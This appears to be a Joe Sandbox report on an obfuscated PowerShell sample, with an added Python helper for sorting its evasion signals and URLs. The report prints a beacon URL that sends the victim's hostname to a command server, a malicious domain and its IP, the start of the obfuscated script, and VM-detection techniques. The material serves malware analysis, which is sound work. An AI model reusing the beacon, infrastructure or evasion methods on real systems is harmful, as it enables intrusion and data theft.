Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation (4 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK Matrix (techniques matched for this sample; the number is the count of matching signatures)

Execution
  Windows Management Instrumentation: 2
  PowerShell: 1
Persistence
  DLL Side-Loading: 1
Privilege Escalation
  Process Injection: 1
  DLL Side-Loading: 1
Defense Evasion
  Virtualization/Sandbox Evasion: 1
  Process Injection: 1
  Obfuscated Files or Information: 1
  DLL Side-Loading: 1
Discovery
  Security Software Discovery: 21
  Virtualization/Sandbox Evasion: 1
  Process Discovery: 1
  Application Window Discovery: 1
  File and Directory Discovery: 1
  System Information Discovery: 11
Collection
  Archive Collected Data: 1
Command and Control
  Encrypted Channel: 1
  Non-Application Layer Protocol: 1
  Application Layer Protocol: 1

No technique was matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact; the remaining cells of the matrix are the unpopulated ATT&CK template.
Source | Detection | Scanner | Label
download.ps1 | 8% | Virustotal |
download.ps1 | 3% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.pngXz | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php? | 0% | Avira URL Cloud | safe
https://go.micro | 0% | Avira URL Cloud | safe
http://crl.micr | 0% | Avira URL Cloud | safe
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527 | 0% | Avira URL Cloud | safe
http://cmacnnkfbhlcncm.top | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cmacnnkfbhlcncm.top | 45.61.136.138 | true | false | (none) | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://go.micro | powershell.exe, 00000000.00000002.41032039963.0000026E94AEA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://contoso.com/ | powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://contoso.com/License | powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.quovadis.bm0 | powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://github.com/Pester/PesterXz | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527 | powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php? | powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cmacnnkfbhlcncm.top | powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://crl.micr | powershell.exe, 00000000.00000002.41065685822.0000026EAAA40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                  No contacted IP infos
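The rows an analyst actually acts on in a report like this are the evasion signatures (the WMI queries against Win32_CacheMemory and Win32_VideoController, the hypervisor strings found in memory, the long thread delay) and the URL table, where one PowerShell-templated beacon URL sits among the manifest and licence strings that PowerShell modules leave in process memory. The following Python is an added triage helper, not part of the Joe Sandbox report and not code from the analysed script: it classifies the behaviour rows into evasion categories and buckets the URLs, separating the variable-templated beacon from module noise. The sample rows are copied from this report (memory-dump identifiers shortened to "<sdmp>"); the category names, the WMI classes beyond the two the sample queried, and the noise-host list are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox behaviour and URL rows (added example, not report code).

Sample rows below are copied from the report (memory-dump identifiers shortened
to "<sdmp>" for readability); category names, the extra WMI classes and the
noise-host list are this example's own assumptions.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# WMI classes whose results routinely betray a hypervisor. The first two are the
# ones this sample queried; the others are commonly used the same way (assumption).
VM_FINGERPRINT_WMI_CLASSES = {
    "Win32_VideoController",  # adapter name, e.g. "VMware SVGA 3D", "Microsoft Hyper-V Video"
    "Win32_CacheMemory",      # CPU cache layout, often missing or uniform on a hypervisor
    "Win32_ComputerSystem",   # Manufacturer / Model
    "Win32_BIOS",             # vendor and serial strings
    "Win32_DiskDrive",        # disk model strings
}
HYPERVISOR_MARKERS = ("vmware", "hyper-v", "virtualbox", "vbox", "qemu", "xen",
                      "isvirtualmachine")

WMI_RE = re.compile(r"ExecQuery\s*-\s*(?P<ns>\S+)\s*:\s*(?P<query>.+)$", re.I)
FROM_RE = re.compile(r"\bfrom\s+(\w+)", re.I)
MEMSTR_RE = re.compile(r"Binary or memory string:\s*(?P<s>.+)$")
DELAY_RE = re.compile(r"threadDelayed\s+(\d+)")
PS_VAR_RE = re.compile(r"\$[A-Za-z_][\w:]*")   # PowerShell variable, including $env:NAME

# Hosts that occur in PowerShell module manifests and test fixtures shipped with
# Windows (Pester, PowerShellGet templates); treat as memory noise (assumption).
NOISE_HOSTS = {"pesterbdd.com", "github.com", "contoso.com", "nuget.org",
               "www.apache.org", "schemas.xmlsoap.org", "aka.ms"}


def classify_behavior(rows):
    """Return (category, detail) tuples for the evasion-relevant report rows."""
    findings = []
    for raw in rows:
        line = raw.replace("Jump to behavior", "").strip()   # drop report link residue
        if (m := WMI_RE.search(line)):
            cls = FROM_RE.search(m.group("query"))
            if cls and cls.group(1) in VM_FINGERPRINT_WMI_CLASSES:
                findings.append(("wmi_vm_fingerprint", cls.group(1)))
        elif (m := MEMSTR_RE.search(line)):
            text = m.group("s")
            if any(k in text.lower() for k in HYPERVISOR_MARKERS):
                findings.append(("hypervisor_string", text))
        elif (m := DELAY_RE.search(line)):
            findings.append(("thread_delay", int(m.group(1))))
    return findings


def summarize(findings):
    """Count findings per category as a plain dict."""
    return dict(Counter(cat for cat, _ in findings))


def triage_url(url, av_verdict="none"):
    """Bucket one report URL: PowerShell-templated beacon, AV-flagged, module noise, other."""
    if PS_VAR_RE.search(url):
        parts = urlsplit(url)
        params = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
        return {"url": url, "bucket": "c2_template",
                "host_is_variable": parts.netloc.startswith("$"), "params": params}
    host = (urlsplit(url).hostname or "").lower()
    if av_verdict.lower() == "malware":
        bucket = "av_malware"
    elif host in NOISE_HOSTS:
        bucket = "module_noise"
    else:
        bucket = "other"
    return {"url": url, "bucket": bucket, "host": host}


# Rows copied from the report above (constructed sample input for this example).
REPORT_BEHAVIOR_ROWS = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9942Jump to behavior",
    "Source: powershell.exe, <sdmp>Binary or memory string: VMware",
    "Source: powershell.exe, <sdmp>Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus",
    "Source: powershell.exe, <sdmp>Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->",
    r"Source: powershell.exe, <sdmp>Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    "Source: powershell.exe, <sdmp>Binary or memory string: vmware8",
]
REPORT_URL_ROWS = [  # (url, Avira URL Cloud label) from the URL table above
    ("http://pesterbdd.com/images/Pester.pngXz", "safe"),
    ("https://go.micro", "safe"),
    ("http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527", "safe"),
    ("http://cmacnnkfbhlcncm.top", "malware"),
]

if __name__ == "__main__":
    found = classify_behavior(REPORT_BEHAVIOR_ROWS)
    print(summarize(found))
    for cat, detail in found:
        print(f"  {cat:20} {detail}")
    for url, label in REPORT_URL_ROWS:
        print(triage_url(url, label))
```

Two caveats the helper encodes follow from the report itself. The ExecQuery rows are actions the script took and carry weight; the memory strings are weaker, because "Hyper-V RAW" paired with mswsock.dll is the name of a Winsock provider present on any Windows 10 host and "IsVirtualMachine" next to "MSFT_MpComputerStatus" is a property of a Defender WMI class, so either can originate from modules loaded into powershell.exe rather than from download.ps1; the helper therefore reports them as a separate category instead of folding them into the WMI findings. The report does not show which host the `$jp1hlsae28owqrv` variable resolves to, so the helper only records that the host is a variable and which parameters (`id`, `key`, `s`) the beacon would send, with `$env:computername` being the victim hostname under PowerShell's string expansion.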
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578248
Start date and time: 2024-12-19 13:33:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected VM Detection
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal68.evad.winPS1@2/7@2/0
EGA Information: Failed
HCA Information:
  • Successful, ratio: 93%
  • Number of executed functions: 15
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
  • Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
  • Not all processes were analysed; the report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found
Time | Type | Description
07:35:13 | API Interceptor | 26x Sleep call for process: powershell.exe modified
13:34:59 | Task Scheduler | Run new task: {3B6AD319-1AFD-4CDE-8E47-6C796A4288D1} path: .
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cmacnnkfbhlcncm.top | download.ps1 (six other analyses of a sample with this name) | malicious | Unknown | 45.61.136.138

The SHA-256 values of the six associated samples are behind links in the report and are not reproduced here. No context is recorded for IPs, domains, ASNs, JA3 fingerprints or dropped files.
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
(The report lists four dropped files with this content; all four share the hashes above.)

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6222
Entropy (8bit): 3.7351045580281332
Encrypted: false
SSDEEP: 96:Eq386C2GHSkvhkvCCtWbPHsNHdbPHs4Hm:l36uyPMXPMj
MD5: 51F639D524222C5434E04918A8554F26
SHA1: A8967382B0C09EE521EF8D0183D8BF88B5126FA1
SHA-256: 5134FCD8FBE8EC729426945192987EE5F7B3A0BCD49780A4234A889BA5968298
SHA-512: D663B96EAAD5D98BDE82CAE583C4CA3D66CF3118DF53C444318871F1E2BD32BEFB2A51A459ED22929907AF7D2CE1C5D39712FAECFA7ACDA1C02627166FA5E9B3
Malicious: false
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...;.}.S.....r.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...o..k.R.....r.R......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y[d....B......................A!.A.p.p.D.a.t.a...B.V.1......Yad..Roaming.@......"S.Yad....D.....................(.~.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y[d....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......YY4..Windows.@......"S.Y[d....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.YZ4....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.YZ4....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yi+....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Ygd....i...........
                                  File type:ASCII text, with very long lines (10876), with CRLF line terminators
                                  Entropy (8bit):6.0111175419643885
                                  TrID:
                                    File name:download.ps1
                                    File size:19'439 bytes
                                    MD5:f91e3c78bfc0cc41330d65764455a851
                                    SHA1:294c15d09a7df4d91e891d7ca3bc2803c8262ce1
                                    SHA256:3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
                                    SHA512:1899a3848c18343b39e0a3cb5887b777e270a032f7447e9554c94a4a757cb05623e3b17c5da1bd3fb43ee2f16a0da64a71e12c99fc81efc86e533c0927b0e700
                                    SSDEEP:384:fD6lYFayIXH9VxzwZ3XPOsGhJ06ZLpAg1cHsf4ftu1vrNpjuFLP2TdQiGo/N:fOlYUyqps3XWfuIVAru1vrNZuURQiGo1
                                    TLSH:F5927EC837C8E8E1C6CD967ED90A7C087762383AD4D56FC0F398D5C563AA294ABD8C40
                                    File Content Preview:$cvdkoxwrnfj=$executioncontext;$inenatreerbealentionerinaten = ([ChAR[]]@((640-(5571804/(52357872/(12327-(54379024/7984))))),(-9718+(93713840/(61561456/6418))),(553812/(18051-(55511100/(61505100/(263+(14980-6008)))))),(9327-9277),(9128/(9681-(72079814/(36
                                    Icon Hash:3270d6baae77db44
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 19, 2024 13:35:15.288777113 CET | 50426 | 53 | 192.168.11.20 | 1.1.1.1
                                      Dec 19, 2024 13:35:16.300379992 CET | 50426 | 53 | 192.168.11.20 | 9.9.9.9
                                      Dec 19, 2024 13:35:16.429333925 CET | 53 | 50426 | 9.9.9.9 | 192.168.11.20
                                      Dec 19, 2024 13:35:20.600438118 CET | 53 | 50426 | 1.1.1.1 | 192.168.11.20
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Dec 19, 2024 13:35:15.288777113 CET | 192.168.11.20 | 1.1.1.1 | 0x961d | Standard query (0) | cmacnnkfbhlcncm.top | A (IP address) | IN (0x0001) | false
                                      Dec 19, 2024 13:35:16.300379992 CET | 192.168.11.20 | 9.9.9.9 | 0x961d | Standard query (0) | cmacnnkfbhlcncm.top | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Dec 19, 2024 13:35:16.429333925 CET | 9.9.9.9 | 192.168.11.20 | 0x961d | Name error (3) | cmacnnkfbhlcncm.top | none | none | A (IP address) | IN (0x0001) | false
                                      Dec 19, 2024 13:35:20.600438118 CET | 1.1.1.1 | 192.168.11.20 | 0x961d | No error (0) | cmacnnkfbhlcncm.top |  | 45.61.136.138 | A (IP address) | IN (0x0001) | false


                                    Target ID:0
                                    Start time:07:35:12
                                    Start date:19/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                    Imagebase:0x7ff7883f0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:07:35:12
                                    Start date:19/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff73a550000
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f67153f224a17059e117a1bb100cafae93a9030b815e1fd58410976c2acef4d
                                      • Instruction ID: 888ca2df5f9c3a8da42a6595fa546a145f4836eb73d8eca46df134e32bc471c1
                                      • Opcode Fuzzy Hash: 9f67153f224a17059e117a1bb100cafae93a9030b815e1fd58410976c2acef4d
                                      • Instruction Fuzzy Hash: 39F19430909E8E8FEBA4EF28C845BED3BD1FF58310F54426ED84DC7291DA78A9458781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69f8316985e1b842439a5a77fc9b48dd732bb2be7b186ea0b7c76f60753bb7e1
                                      • Instruction ID: 18076e9c6ae0b4c2062da08ff326e1bbde97c42faf0c0743cfc05643aea98b03
                                      • Opcode Fuzzy Hash: 69f8316985e1b842439a5a77fc9b48dd732bb2be7b186ea0b7c76f60753bb7e1
                                      • Instruction Fuzzy Hash: 4FE1C230A09E8E4FEBA8EF28C8557ED3BD1EF54350F54426ED84DC7291CB78A8858781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41072791374.00007FF8D1D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1D80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1d80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ?6_H$BNs$Xz$Xz$Xz$p!
                                      • API String ID: 0-1452262832
                                      • Opcode ID: 3d05eb94e2a80eaad38adaaeff00ddd44092d2f6caeedefd86704c18a97bad11
                                      • Instruction ID: 07e11113e216ea8d98a7fdfb3f45c48ae5b5397a0e7a8e40336e365a941aff9c
                                      • Opcode Fuzzy Hash: 3d05eb94e2a80eaad38adaaeff00ddd44092d2f6caeedefd86704c18a97bad11
                                      • Instruction Fuzzy Hash: 4F82A132E0CA8A4FFB95EB2884556687BE1FF65364F5801BEC04DC7293DE29AC45CB41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 201b2656ec2b47a738c73b2c0b4824b7ca209f73a2d131c3557e45eacf28833a
                                      • Instruction ID: 7f54fd992a36a626d349e2d926298456d54fbd18df13c0f96e8bd36f4786f46e
                                      • Opcode Fuzzy Hash: 201b2656ec2b47a738c73b2c0b4824b7ca209f73a2d131c3557e45eacf28833a
                                      • Instruction Fuzzy Hash: F1C14C30A08D4E8FEF95EF58C495AADBBE1FFA8350F15416AD40DD7295DA34E881CB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22c3a61526984bef6e61f02c7d9f31f9c769fc82d6a7737538e6ec27a2b579fe
                                      • Instruction ID: d4a1cd7a2c881905f609860ba5ec66d3b27e70437387b9a1d7ba27b5d1ad4ef6
                                      • Opcode Fuzzy Hash: 22c3a61526984bef6e61f02c7d9f31f9c769fc82d6a7737538e6ec27a2b579fe
                                      • Instruction Fuzzy Hash: 6AB1D630A08E4E4FEBA9DF28D8457ED3BD1EF55350F54426EE44DC7292CE74A8858B82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0af51b50c3b98e309ec182f6b3ae425aca0c7a1d947d83322c096d99d97a8508
                                      • Instruction ID: c82719c347cbd668cabb2aa7e1dda5be6da32c03f944bb3f30808ee0f76a7932
                                      • Opcode Fuzzy Hash: 0af51b50c3b98e309ec182f6b3ae425aca0c7a1d947d83322c096d99d97a8508
                                      • Instruction Fuzzy Hash: 4F21913794EEC68FF7818F6458591A83FA0FF552407D911FBD8888B2A7E625EE08C341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6b2ef7e0e9f13e75f48ee552768628c02d8cffc4d41f70f1eb3666c0df316e0
                                      • Instruction ID: efb94cf97c951830cccd9d26e1ff86909c2970208f607c52bc709c3ccd74cfe8
                                      • Opcode Fuzzy Hash: a6b2ef7e0e9f13e75f48ee552768628c02d8cffc4d41f70f1eb3666c0df316e0
                                      • Instruction Fuzzy Hash: 98118E7184E7C54FDB479B344C650943FB09E23240B1A02DBD485CB1E3DA699809C7A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 833e5c3897657da9ee90e56d5a44fe9b462e9c77f124d35ba961377c9539c4fc
                                      • Instruction ID: 17af1344562e40710040bdb6daeb57bf4b6232bc96c6b16e3186008fe94382c4
                                      • Opcode Fuzzy Hash: 833e5c3897657da9ee90e56d5a44fe9b462e9c77f124d35ba961377c9539c4fc
